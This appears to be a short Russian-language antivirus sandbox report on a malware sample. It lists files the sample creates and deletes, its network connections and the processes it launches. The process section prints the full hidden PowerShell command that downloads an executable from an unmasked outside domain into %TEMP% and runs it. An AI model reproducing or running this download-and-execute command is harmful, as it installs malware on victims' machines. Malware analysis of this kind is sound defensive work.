Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\program_start_2026-02-07_22-08-33.png
- %TEMP%\auth_start_2026-02-07_22-08-57.png
Удаляет файлы, которые сам же создал
- %TEMP%\program_start_2026-02-07_22-08-33.png
- %TEMP%\auth_start_2026-02-07_22-08-57.png
Сетевая активность
Подключается к
- 'di##ord.com':443
- 'vc###ibrary.uk':443
- 'x1.#.lencr.org':80
- 'ke##uth.win':443
TCP
Запросы HTTP GET
- http://x1.#.lencr.org/
- http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?ef##############
Другие
- 'di##ord.com':443
- 'vc###ibrary.uk':443
- 'ke##uth.win':443
UDP
- DNS ASK di##ord.com
- DNS ASK vc###ibrary.uk
- DNS ASK x1.#.lencr.org
- DNS ASK ke##uth.win
Другое
Ищет следующие окна
- ClassName: 'TaskManagerWindow' WindowName: ''
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=oy7DDikwUmXxyY968EPRE008.txt' -OutFile $env:TEMP\BK793020.exe; Start-Proc...
- '<SYSTEM32>\cmd.exe' /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=oy7DDikwUmXxyY968EPRE008.txt' -OutFile $env:TEMP\BK793020.exe; Start-Process -FilePath $env:TEM...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=oy7DDikwUmXxyY968EPRE008.txt' -OutFile $env:TEMP\BK793020.exe; Start-Process -FilePath $env:TEMP\BK793020.exe...
- '<SYSTEM32>\cmd.exe' /c cls
